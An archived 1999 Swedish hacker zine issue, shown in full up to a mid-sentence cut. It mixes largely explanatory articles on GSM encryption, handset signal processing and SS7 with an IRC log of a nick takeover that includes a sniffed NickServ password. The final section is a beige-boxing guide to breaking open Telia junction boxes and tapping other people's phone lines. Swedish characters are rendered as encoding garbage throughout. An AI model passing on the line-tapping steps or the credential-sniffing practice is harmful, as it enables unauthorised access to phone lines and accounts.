informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/magazines/SWEDISH/outlaw-07.txt

1067 lines
47 KiB
Plaintext
Raw Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Heretics Inc. tar o presenterar....
[ Outlaw Informativa ]
issue 7, 99-09-08
___________________
O U T L A W 7
September 7, 1999
___________________
- A Heretics Inc. Production -
"Those who desire to give up freedom in order to gain
security, will not have, nor do they deserve, either
one".
-Thomas Jefferson
Nu ska jag (EDITOR) aka BL<42><4C> skriva en liten intro och lite annat skit som
vi alltid brukar g<>ra. Tja, nu <20>r det regnigt och skitigt...det <20>r s<>na dag-
ar man sitter och myser framf<6D>r n<>rmsta lilla Utvecklings milj<6C> *mysa*
Nu vill jag uppmana alla att inte klaga p<> stackars crazy-train, han har s<>
inni helvete inte rippat n<>t i artikeln om GSM.......jaja, Jag tror fan jag
tar och skiter i artikeln om Mellanf<6E>rst<73>rkare som jag snackade om i f<>rra
numret. Jag kan f<>r lite om dom och verkar ganska ointressanta. Hmm, just
fan...va gillade ni min GSM security artikel? c0l4..n<><6E>, det e lugnt du
beh<65>ver inte klaga p<> den; jag vet vad du tycker om allt jag g<>r, s<> <20>r det
ju n<>r man <20>r FJ<46>RTIS !!..men kom ih<69>g 14 <20>r en <20>lder och inte lixom en stil
eller typ av blod..<2E>hh, skit samma. Jag har varit ute med Segelb<6C>ten ocks<6B>,
1 vecka dess verre..men de va sk<73>nt som fan men man l<>ngtade hem till datorn
och lukten av gata. Nu ut och haxxa VMS burkar nu. Jag <20>r inte elajt jag <20>r
bara 0nd och st<73>r f<>r mitt citat 0ndska <20>r K<>rlek. Lite annat shit ocks<6B>,
o-i var ju f<>rut men nu <20>r det en blandning av seri<72>st och humor/ironi.
C:\> type C:\WINDOWS\SYS.LOG
Begin of Microsoft(C)(R)osv..osv..osv.., System LOG
Nope, no fraud on your .comp today just Bill Gates looking at funny porn
pics.
C:\>
Min humor <20>r s<> d<>lig att den <20>r bra, det <20>r det som <20>r po<70>ngen, snorrrk.
-----------------------------------------------------------------------------
Disclaimer
-----------------------------------------------------------------------------
All denna skitiga information <20>r bara till f<>r utbildningssyfte och s<>nt
tjafs. S<> du f<>r fan ta ansvar f<>r dina egna handlingar om du skulle
hamna i bur p<>grund av utf<74>ringar av informationen som man faktiskt kan
l<>sa h<>r. Kiss och Bajs <20>lder p<> oss som g<>mmer sig bakom en Disclaimer, det
<20>r ju alltid bra att ha en...paranoid aka diox1de.
-----------------------------------------------------------------------------
Medverkande
-----------------------------------------------------------------------------
Jo fan s<>klart man m<>ste ha en lista p<> alla som <20>r med och skriver till just
detta issue. <20>HHH...h<>r <20>r den !
Alias: diox1de Contact: keytrace@usa.net
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Alias: dthl Contact: #Phreakerz@DALnet
<20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Alias: ncode Contact: #swehack@DALnet
<20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Alias: crazy-train Contact: #Phreakerz@DALnet
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-----------------------------------------------------------------------------
w w w . i n t e u p p e <20> n . c o m
I N N E H <20> L L S F <20> R L E K N I N G
<20> Staff
1:1 . Editor
1:2 . Disclaimer
1:3 . Medverkande
1:4 . Inneh<65>llsf<73>rlekning
1:5 . Aktuellt
1:6 . Outlaw Informativa s<>ker skribenter
<20> Phreaking och Phelefoni
2:1 . S<>kerhet i GSM systemet, del #2 av: diox1de
2:2 . GSM telefonen och dess funktion av: crazy-train
2:3 . SS7 - Den magiska signalen av: diox1de
2:3 . Adapter f<>r vita terminaler av: dthl
2:4 . Polisen tvingar telebolagen, arghh av: diox1de
<20> Hacking, Networking och Unix
3:1 . msg'a kanalen du <20>r bannad p<> av: diox1de
3:2 . Vem som helst kan l<>sa din Hotmejl av: diox1de
3:3 . 0ldschool Hacking: /etc/shadow av: diox1de
3:4 . Linux S<>kerhet Administration av: diox1de
3.5 . Cisco kommando lista av: ncode
3:6 . Ethernet kort till Windows CE av: diox1de
3:7 . Svenska hackers hackade NASA, busted ! av: diox1de
<20> Bomber (Hj<48>lp!)
4.1 . Svin l<>tt & rolig Bomb av: dthl
<20> Snusk och slut p<> numret
5:1 . Copyright
5:2 . 3x1t3d(), eller n<>t
-----------------------------------------------------------------------------
Aktuellt
-----------------------------------------------------------------------------
<20> Knash's nick <20>vertaget
Knash fick reda p<> att hans nick blev <20>vertaget runt midnatt den 31 august-
i. Den lilla fj<66>rtis till lamer sig sig ha sniffat nickserv med ett elajt
h4xx0r program som han med sj<73>lvklarhet inte alls skrivit sj<73>lv. Eftersom
nickserv skickar ident requests som <20>r i form av kommandon i klartext s<> <20>r
det fullt m<>jligt att sniffa nickserv. Knash har bytte nick tempor<6F>rt till
dcrypt men har nu ett fast nick (diox1de) nuvarande diox1de snackade med
lamern som s<>ger att hans orginala nick <20>r [f]LASH, men inget <20>r klargjort
<20>n.
$ log beginning
knash^ (fIKUS@z2-1-76.sbbs2.net)
<knash^> jaha
<knash^> hejhej
<knash^> :)
<Dcrypt> vem e du ?
<knash^> <20>ke
<knash^> <20> du <20> knash
<knash^> dum du <20> <20> ger bort ditt pass
<Dcrypt> det har jag inte gjrot
<Dcrypt> gjort even
<knash^> j
<knash^> o
<Dcrypt> hmm..skicka log
<knash^> jag <20> ivil haxxor <20> snodde ditt nick
<knash^> :)
<Dcrypt> <20> s<> ivil du <20>r, varf<72>r gjorde du det d<>?
<knash^> [Knash^(me@t3o29p13.telia.com)] identify secretcpp
<knash^> :)
<Dcrypt> sniffade du eller ?
<knash^> yeye... whatevah :)
<knash^> tycker att ni p<> #swehack ska sluta snacka om att ni <20> s<> elit
hela tiden <20> g<>ra n<>t <20>t saken
<Dcrypt> hehe, jag har inte sagt att jag e l33t..
<knash^> tsss
<knash^> men du f<>r inte tebax ditt nick iaf :)
<knash^> om jag f<>r ett shell s<> f<>ru det
<knash^> :)
<Dcrypt> jag har inge shel
<Dcrypt> shell
<knash^> fixa d<>
<knash^> :)
<Dcrypt> <20>hh.
<knash^> jo
<Dcrypt> nej...<2E>r du s<> lam s<> att du tar <20>ver n<>ns nick och utpressar per-
sonen s<> kan du lika g<>rna beh<65>lla det
<knash^> haha
<knash^> lam?
<knash^> vill ha mer shells juh!
<Dcrypt> d<> <20>r det inte din dag i dag
<knash^> mohaha
<knash^> tar <20>ver n<>ns nick? det va juh du som gav det till mej
<Dcrypt> ja visst du
<Dcrypt> skicka loggen da
<knash^> har redan visat dej
<Dcrypt> bytt passwd har du gjort ocks<6B>, <20>nnu mer elajt
<knash^> javet
<knash^> annars kan juh du ta tebax det :)
<Dcrypt> inte mot n<>t shell iasfs
<knash^> tss
<knash^> haru n<>t att trada d<>?
<knash^> ftp?
<Dcrypt> nepp, du f<>r inget av mig iafs
<knash^> haha
<knash^> oOOoOo
<knash^> nuker
<Dcrypt> snacka inte skit om dig sj<73>lv
<knash^> haha
<knash^> lamer
<Dcrypt> Har du kul ?
<knash^> ja
<knash^> :)
<knash^> bara s<> du vet s<> <20> jag [f]LASH <20> fLAERP <20> jag sniffade nickserv
s<> jag har p<> alla som identifyade d<>
<knash^> :)
<Dcrypt> k, den d<>r [f]LASH verkar inte kunna ett skit
<knash^> hehe
<knash^> ne javet
<knash^> han <20> j<>tte lam
<knash^> ojoj
<knash^> d <20> JAG dsom <20> [f]LASH din nolla <20> jag <20> mer elit <20>n du n<>nsin
kommer bli
<knash^> :)
<Dcrypt> Du fattar inget, klart jag vet att flash e du..
<knash^> lamer du <20>
<knash^> sluta snacka i g<>tor d<>
<Dcrypt> eftersom du <20>r s<> j<>vla l33t s<> borde du fatta hur man snackar.
<Dcrypt> S<>g n<>t du kan
<knash^> typ en massa.. lite c.. lite linux.. massa win :).. ganska lam men <20>nd<6E>
mer leet <20>n du
<Dcrypt> skulle inte tro det
<Dcrypt> win <20>r inget att kunna
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andv<64>nds till
<Dcrypt> Jaja, best<73>m sj<73>lv..ge mig tillbaka nicket eller beh<65>ll det
<knash^> beh<65>ller
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andv<64>nds till
<Dcrypt> Din fula lamer
<knash^> hihi
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andv<64>nds till
<Dcrypt> !
Som ni ser s<> visste inte den som kallar sig [f]LASH (muwahah, lamt nick)
vad Public/Private key andv<64>nds till.
-----------------------------------------------------------------------------
Outlaw Informativa s<>ker skribenter
-----------------------------------------------------------------------------
Outlaw Informativa eller gruppen s<>ker medlemmar som har hyffsad kunskap och
inte har n<>t emot att skriva. Man ska ha fler kunskaper <20>n Phreaking, vi vill
inte ha en massa lajta beige-boxers h<>r. Outlaw Informativa har aldrig skriv-
it om hur man bygger en LMHS och kommer aldrig att g<>ra.
Bra att kunna om du vill bli med:
Hacking (N<>tverk, Bakd<6B>rrar etc) Unix (hur det funkar, s<>kerhet, n<>tverk)
Phreaking (V<>xlar, signalsystem etc) Programmering (t.ex. Assembler, C/C++,
Java osv) Kryptering (Nyckelhantering, algoritm strukturer osv)
Detta <20>r absolut inga krav, men har du kunskaper kring detta <20>r det stor
chans att du kan bli en av oss ;)..S<> l<>nge du har n<>t att skriva om och
vet ditt syfte till att skriva och ger ut bra information s<>nt som folk
l<>ser och inte kastar bort.
Maila keytrace@usa.net om du vill bli 0n3 0f us =)
-----------------------------------------------------------------------------
S<>kerhet i GSM systemet, del #2
-----------------------------------------------------------------------------
[Inledning]
I f<>rsta delen om GSM s<>kerhet skrev jag om hj<68>rtat "Subscriber Identity Aut-
hentication, hur det funkade teoretiskt och vilka algoritmer som andv<64>ndes
till vad. F<>r att l<>sa den h<>r delen beh<65>ver du lite f<>rst<73>else f<>r olika
element i kryptering, men jag kommer hj<68>lpa till lite end<6E> :P
[A5 i teorin]
A5 som ni kanske inte kommer ih<69>g (om inte, kolla Outlaw-06) krypterar tal
mellan 2 mobilphelefoner med nyckeln Ki, mkt mer beh<65>ver du inte fatta om du
vill ha en mer omfattande f<>rklaring s<> l<>s outlaw-06, uhmm...damn jag st<73>r
och tjatar om outlaw-06 hela tiden...denna artikel <20>r ju baserad p<> att man
l<>st Del #1. Observera att det h<>r <20>r delvis rippat eftersom jag sj<73>lv inte
fattar riktigt allt, men texten <20>r ju skriven f<>r er :) Jo f<>ressten det <20>r
10% rippat s<> att ni inte tror att jag rippat 90% av den, beheeh.
A5 <20>r ett "streamcipher" som skapas av tre LSFR (Linear Feedback Shift Regi-
ster) av graderna 19, 22 och 23.
Newbie note: Ett streamcipher <20>r teknik vid kryptering, den krypterar en bit
i taget med hj<68>lp av en keystream.
Klockkontrollen <20>r en slags tr<74>skel funktion av de mittersa bitarna i de tre
olika skift-registren.
Summan av graderna f<>r skift-registren 64 (19+22+23) och d<> andv<64>nds allts<74>
en 64-bits "session key" f<>r att initiera regstren.
Newbie note: Session Key <20>r en symmetrisk nyckel och det inneb<65>r att den
andv<64>nds b<>de vid kryptering och dekryptering.
Sen matas det 22-bitars ramnumret in i TDMA registret.
F<>r varje TDMA skapas tv<74> 114-bitars keystreams sedan g<>r en XOR p<> Downlink
och Uplink (Trafiksignaler)
Newbie note: 890 och 915 MHz anv<6E>nds f<>r Uplink och 935 och 960 MHz f<>r
downlink. Uplink menas kommunikationen mellan phelefon till ba-
sstation medans Downlink anv<6E>nds f<>r kommunikation i motsatt
riktning.
S<>kerheten i detta beror p<> hur cepe man <20>r. Har man inte tillr<6C>cklig l<>ngd
p<> nyckeln och hur passa bra "keystreams" <20>r och hur slum<75>ssigt generard
den <20>r.
Lite info h<>r kanske <20>r lite lik "Att f<>rst<73> Telekommunikation" och det kan-
ske beror p<> att jag f<>tt infon d<>r ifr<66>n.
[Slutord]
Mer om GSM S<>kerhet kommer i Outlaw Informativa, issue #8 d<>r jag hade t<>nkt
att ta upp mer om olika egenskaper i GSM systemt.
-----------------------------------------------------------------------------
GSM telefonen och dess funktion
-----------------------------------------------------------------------------
En GSM-telefon kan beskrivas med ett blockschema.
H<>r kommer detta och det beskriver en GSM-telefon's s<>ndare och mottagare.
_______
| GSM |
|Telefon|
|_______|
_____/ \_____
/ \
_______________|___ _____|________________
270 kbit/s --> [Moduleringss<73>nadare]-------------[Mottagare/demodulering]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
____________|___ _____|___
33,8kbit/s --> [Skur-formatering]-------------[Utj<74>mnare]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD>
______|___ _____|______
[Kryptering]-------------[Dekryptering]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
________|___ _____|________
[Interleaving]-------------[Deinterleaving]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
456bitar/20 ms --> ________|___ _____|_
22,8 kbit/s [Kanaldekoder]-------------[Decoder]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C>
260bitar/20 ms --> ______|___ _____|______
13 kbit/s [Talkodning]-------------[Talavkodning]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
160 samples * 8 bitar/20ms --> ____|___ _|_
[Segmentering] [D/A]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|<7C><><EFBFBD> <20>|<7C>
8000 samples/s * 8 bitar --> _|_ _____|___
[A/D] [H<>gtalare]
<20>|<7C> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
____|___
[Mikrofon]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
H<>r nedanf<6E>r kommer jag bara ta upp de mest intressantaste bitarna av blocks-
chemat.
Talkodningen-
Bithastigeten 64kbit/s f<>r tal<61>verf<72>ringen <20>r en alldeles f<>r stor informati-
onsm<73>ngd f<>r tt effektivt uttnyttjande av n<>tet. Man inf<6E>r talkodning vilket
inneb<65>r att man skapar en kopia av det m<>nskliga talorganet. V<>rat talorgan
arbetar relativt l<>ngsamt och man kan utan alltf<74>r stor avvikelse fr<66>n
verkligheten r<>kna med att det inte <20>ndrar karakt<6B>r mer <20>n ar 20 ms. Talet
analyseras under 20 ms. Med hj<68>lp av motsvarande utrustning i mottagaren
omvandlas signalen till ett s k syntetiskt eller konstgjort tal. P<> detta
s<>tt kan <20>verf<72>ringshastigheten minskas till 13 kbit/s.
Talkodningen <20>r konstruerad f<>r talsignaler och <20>r inte l<>mplig f<>r
<20>verf<72>ring av andra signaler, t ex rena datasignaler fr<66>n datorer och faxar
som <20>r anslutna till mobiltelefonen. Dessa ansluts via ett s<>rskilt modem.
Och signalerna passerar inte denna talkodaren som kortar ner <20>verf<72>ringshast-
igheten, utan man kan k<>ra p<> i c:a 64kbit/s.
Kanalkodningen-
Kanalkodningen inneb<65>r att man kan uppt<70>cka och korrigera fel i den mottagna
bit-signalen. Det finns d<> ytterligare bitar tillg<6C>ngliga, som anv<6E>nds som
kontrollbitar eller checkbitar. Dessa bitar ger mottagaren m<>jlighet att
korrigera fel som uppst<73>tt, t ex p<> grund av st<73>rningar i <20>verf<72>ringen.
Interleavingen-
Interleaving <20>r en metod att ytterligare minska felen i <20>verf<72>ringen. Kanalk-
odningen r<>ttar kortvariga fel, fel i enstaka bitar Med interleaving kan mera
"l<>ngvariga" fel korrigeras, dvs interleavingen motverkar att flera bitar
f<>ljande varandra f<>rsvinner. Detta sker genom att den digitaliserade
signalens bitar inte s<>nds i logsk f<>ljd utan bitarna i ett 20 ms-block s<>nds
iv<69>g i en annan f<>ljd, vilket g<>r att inte n<>nting st<73>mmer.
Kryptering/Formatering-
Kryperingen ska fungera s<> att det ska vara "om<6F>jligt" f<>r utomst<73>ende att
avlyssna samtalet. I mobiltelefonens processor finns en krypteringsnyckel
lagrad. Var g<>ng telefonen f<>rs<72>ker registrera en ny postition eller koppla
upp ett samtal, kontrolleras abonnentens identitet. Fr<46>n MSC skickas ett slu-
mptal till telefonen. Med hj<68>lp av en algoritm som tillh<6C>r nyckeln ber<65>knas
ett svar, som telefonerna skickar tillbaka till MSC och vidare till VLR som
kontrollerar att svaret <20>r korrekt. Om svaret inte <20>r korrekt, s<> finns
abonnemanget hos n<>gon annan operat<61>r eller
<20>r av n<>gon anledning inte l<>ngre giltigt.
N<>r data s<>nds, krypteras dessa i telefonen med hj<68>lp av den "inbyggda"
nyckeln och det <20>vers<72>nda slumptalet. Den krypterade signalen tas emot av
n<>tet, som omkyrpterar signalen s<> att den passar till mottagarens nyckel och
det slumptal som <20>vers<72>nts till denna. Om allt <20>r korrekt sker en dechifferi-
ng i mottagartelefonen.
Efter att meddelandet krypterats i s<>ndartelefonen, sker n<>got som kallas f<>r
skur-formatering. Det betyder att informationen p<> l<>pmligt s<>tt kombineras
med information om den kanal som kommer att anv<6E>ndas f<>r s<>ndningen.
Efter dessa ingrepp ligger datahastigheten p<> c:a 33,8 kbit/s.
Nu <20>n s<>l<EFBFBD>nge har vi g<>tt igenom det mest intressanta steg-f<>r-steg i vad som
egenligen h<>nder i din lilla nalle :)
Nu ska jag g<> in lite djupare in p<> <20>mnet "Modulering/s<>ndning":
Mobiltelefonen arbetar p<> frekvensomr<6D>det 900 MHz. Det aktuella frekvensomr<6D>-
det ligger mellan 890 och 915 MHz vid s<>ndning och 935 och 960 MHz vid
mottagning. Frekvenskillnaden mellan den s k b<>rv<72>gen vid s<>ndning respektive
mottagning <20>r 45 MHz. Avst<73>ndet mellan tv<74> kanaler ska vara 200 kHz. I
vardera s<>ndningsriktningen finns d<>rf<72>r totalt 124 kanaler att dela p<>. P<>
grund av att flera delar p<> dessa. 124 kanaler, har varje GSM-operat<61>r i
Sverige 4,8 MHz, dvs 24 kanaler till f<>rfogande f<>r sin egna trafik.
B<>rv<72>gen, t ex 900 MHz, <20>r en sinusformad signal som alstras p<> s<>ndaren. Den
informationen som ska <20>verf<72>ras, f<>r p<> n<>got s<>tt f<>r<EFBFBD>ndra b<>rv<72>gen fr<66>n
s<>ndaren. Detta kan ske genom att amplituden, frekvens eller fasl<73>get p<>verk-
as. Detta kallas f<>r modulering som ni kanske vet :)
GSM anv<6E>nder en typ av fasmodulering. B<>rv<72>gen inneh<65>ller allts<74> en avikelse
fr<66>n den ursprungliga sinuskurvan som motsvarar v<>ran krypterade information.
Nu g<>ller det att utnyttja de 24 kanaler s<> effektivt som m<>jligt. Genom att
utnyttja en typ av timesharing kan 8 f<>rbindelser etableras per kanal. Man
kan s<>ga att varje s<>ndningsperiod delas upp i 8 intervall och i ett s<>dant
placeras v<>r formaterade skur av krypterad information. Efter moduleringen <20>r
datahastigheten 270 kbit/s R<>ckvidden <20>r begr<67>nsad f<>r en basstation och en
telefon <20>r maximalt n<>got tiotal km vid frekvenser av 900 MHz, kan samma
anv<6E>ndas av flera basstationer utan att detta st<73>r <20>verf<72>ringen. Det g<>ller
endast att f<>rdela kanalerna mellan basstatuinerna p<> ett intelligent s<>tt.
Varje basstation t<>cker en cell. Ett antal celler bildar tillsammans ett
cluser och tillg<6C>ngliga kanaler f<>rdelas p<> dessa celler. Detta inneb<65>r att
samma kanal anv<6E>nds f<>r <20>vering av m<>nga samtal, och det <20>r inte alls s<>kert
att s<>ndande telefon och mottagande telefon anv<6E>nder samma kanal. Det viktiga
<20>r att de akuella uppkopplingarna finns s<> l<>ngt ifr<66>n varandra att de inte
st<73>r varandra. Det inneb<65>r ocks<6B> att n<>r du l<>mnar en cell, kan du, naturlig-
tvis automatiskt, kopplas om till en annan kanal under p<>g<EFBFBD>ende samtal.
Aktuellt MSC sk<73>ter om kanalvalet.
N<>tet-
Nu s<>ger vi att din krypterade signal kommit ut p<> n<>tet. I det fasta telen<65>-
tet <20>r <20>verf<72>ringskapaciteten n<>stan obegr<67>nsad. H<>r f<>rs den vidare till den
operat<61>rs n<>t som den abonnent du anropat <20>r ansluten till. Sedan f<>rs den
vidare till den MSC som din talmottagare <20>r uppkopplad till. Anpassningen <20>r
kryptering sker till mottagarens kodnyckel och algoritm.
Ok nu har vi g<>tt igenom s<>ndnings-delen.
I n<>sta nummer av Outlaw Informativa ska jag skriva lite om mottagardelen,
vilket <20>r lite mindre komplicerat.Ok nu skriver jag in vad alla f<>rkortningar
jag anv<6E>nt betyder.
GSM = Global System for Mobile Communications, eller p<> svenska : globalt
mobil-kommunikationssystem.
NMT = Nordic Mobile Telephone System (analogt system, omtalat i 900 MHz
frekvensen om ni inte visste detta)
MSC = Mobile Switching System
VLR = Visitor Location Register = "bes<65>kregister".
-----------------------------------------------------------------------------
[Grundl<64>ggande] SS7 - Den magiska signalen
-----------------------------------------------------------------------------
Innh<6E>ll:
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
--> Inledning
--> in-band/out-band signalering
--> Associerad signalering
--> Olika funktions element i SS7
[Inledning]
SS7 <20>r ett ett Digitalt Signallerings N<>tverk som av<61>nds f<>r att koppla och
hantera kommunikationen p<> de allm<6C>na telen<65>tet, det kallas "Smart Network"
och menas att det har inbyggda funktioner i sj<73>lva n<>tverket. SS7 <20>r uppdelat
i olika delar och varje har sin egen funktion att hantera. Eftersom SS7 <20>r
digitalt kan man andv<64>nda den till andra saker t.ex. D-kanalen f<>r ISDN.
SS7 har ocks<6B> m<>jligheter att kunna <20>verf<72>ra multimedia som bild, ljud och
data. Teletrafik och Datatrafik s<>nds <20>ver olika kanaler eftersom det <20>r
olika krav p<> utrustning, datatrafik kr<6B>ver grymmt mycket h<>gre bandbredd <20>n
teletrafik.
SS7 = Signalling Systems 7
[in-band/out-band signalering]
Fr<46>n b<>rjan va SS7 ett "multi frequency in-band- telephony signalling system"
men har nu ersatts med "common channel out-of-band signalling system"
Fr<46>n b<>rjan va det t<>nkt att SS7 bara skulle f<>rnya den gamla tekniken att
koppla upp och hantera teletrafik men har nu f<>tt andra andv<64>ndningsm<73>jlighe-
r, SS7 kan t.ex. transportera ISDN signaler som andv<64>nds vid Internet-Kommun-
ikation. F<>r att du ska f<>rst<73> vad in-band och out-band signalling <20>r m<>ste
det finnas en enkelt f<>rklaring och jag hoppar inte <20>ver n<>t. In-band signal-
ling <20>r n<>r ALL information g<>r genom samma. Out-band signalling <20>r lite
annorlunda. Out-band signallning etablerar en separat digital kanal f<>r
v<>xling av signal information. Denna kanal kallas f<>r "Signal L<>nk". Signal
L<>nkarna <20>r till f<>r att hantera all n<>dv<64>ndig information i signalering
mellan olika noder. S<>, vad <20>r det som <20>r s<> bra med out-band signalering d<>?
--> out-band signalling till<6C>ter transport med h<>gre hastigheter med mer
data. 56kbps kan hantera data s<> grymt mycket snabbare en
"Multi Frequency Outpulsing"
--> out-band till<6C>ter att starta signalering n<>r som helst och var som
helst.
--> out-band g<>r det m<>jligt att signalera till olika funktioner i n<>tverk-
et d<>r det inte <20>r n<>n "Direct Trunk Connection".
[Associerad signalering]
En typ av associerad signalering
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|***************************|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
| |<7C><><EFBFBD><EFBFBD>| |***************************| |<7C><><EFBFBD><EFBFBD>| |
| |V<>xel |***************************| |V<>xel | (Ful ASCII, by diox1de(C)
| | #1 | |***************************| | #2 | |
| | | |***************************| | | |
| |____| |---------------------------| |____| |
| | | |
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> * = "Voice Trunk" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
- = "Signalling Link"
Associerad signalering funkar bra s<> l<>nge v<>xeln bara kraven f<>r signalerin-
gen <20>r mellan sig sj<73>lv och andra v<>xlar. "The North America implementers"
ville designa ett SS7 n<>tverk som gjorde det m<>jligt att vilken "node" som
helst skulle kunna v<>xla signaler med vilken <20>vrig SS7 kabel node" som helst.
Fast Associerad Signalering blir mycket mer kompilcerat n<>r man ska v<>xla
signaler mellan olika "noder" som inte har n<>gon fast anslutning.
[Olika funktions element i SS7]
SSP : Service Switching Points
<20>r en telefon-v<>xel med inbyggd mjukvara f<>r Signallings Systems 7 och
Hanterar uppkopplingar och addressering av anrop. Kan ocks<6B> andv<64>ndas
f<>r att st<73>lla fr<66>gor till en Central databas (SCP) om vilken v<>g
en f<>rbindelse ska kopplas upp vid. SSP <20>r sj<73>lva porten till SS7 n<>te-
t.
STP : Signal Transfer Points
Hanterar n<>tverkstrafiken mellan olika signalerpunkter. STP kollar
information i SS7 paketen f<>r att veta var den ska vidarbefoga paketet.
Detta kan vara en liknelse hur en HUB arbetar. En signalpunkt andv<64>nder
en "Routing table" f<>r att veta var paketet ska n<>gon stanns.
SCP : Service Control Points
<20>r en typ av databas som kan kolla information och verifiera t.ex.
kreditkort.
[Efterord]
Hoppas du fattade n<>t iafs..och sen f<>r jag inte gl<67>mma k<>lla satt inga idio-
ter f<>r f<>r sig att jag rippar =)
Jag gjorde det v<>ldigt grundl<64>ggande nu, faktiskt s<> b<>rjade jag skriva avan-
cerat hur n<>tet fungerade och vilket element som kommunicerade med vilket men
eftersom jag inte alls lyckades med att g<>ra en tydlig ascci bild s<> blev det
inget av det, om du skickar n<>t liten dos program till mig som kollar alla
pixlar och s<>nt och formar om en bild till ascii s<> kan jag nog ta mig i
kragen och skriva en avancerad del.
Maybe be to continued...
K<>lla: --> Att f<>rsta Telekommunikation
--> Illumient, Signalling Systems 7.
-----------------------------------------------------------------------------
Adapter f<>r vita terminaler
-----------------------------------------------------------------------------
Ok, nu b<>rjar vi d<>. Den vita terminalen <20>r en f<>rnyad version av den "gamla"
svarta terminalen med skruvar. Nuf<75>rtiden s<> byts en del gamla terminaler ut
mot de nya, d<>rf<72>r telia g<>r detta <20>r att f<>rhindra missbruk, fast det <20>r ju
l<>tt att g<> igenom det <20>nd<6E>. I bland s<> sitter det adapters p<> vit terminale-
n, ( adaptern g<>r beige-boxing fr<66>n vita l<>tt som en pl<70>tt ) jag tror att
adaptern <20>r till f<>r linjemannens special lmhs, det brukar sitta en adapter
p<> n<>stan alla vita terminaler, men sitter det ingen adapter d<>r du ska beiga
s<> <20>r det bara att bryta upp en annan japp och ta l<>s adaptern och s<>tta den
p<> den viting som du ska abusa. De flesta vet hur en vit terminal, om du inte
vet det s<> kan du ta en titt p<> vsp's bildarkiv och vet du inte hur en
adapter s<> kan du kolla p<> den h<>ra fina ascii bilden:
_______ _______
/ | | \
| |_________________________________________| |
| ___/ \___ |
| | ____ _____ _____ _____ _____ _____ | |
| |___ | | | | | | | | | | | | ___| |
| \ |___| |___| |___| |___| |___| |___| / |
| |__________________________________________| |
| | | |
\_______ ____/
Jag vet att denna bild inte s<>ger s<> mycket men jag ska fota en sedan, fast
h<>r <20>r lite mer fakta om adaptern, den <20>r gr<67> och p<> ovan sidan st<73>r det:
A952 7569 8840. P<> varje adapter finns det 10 linjer ( som p<> vita och svarta
terminaler ) och allts<74> 20 h<>l. Du l<>ddar/binder fast n<>lar eller tv<74> sm<73>
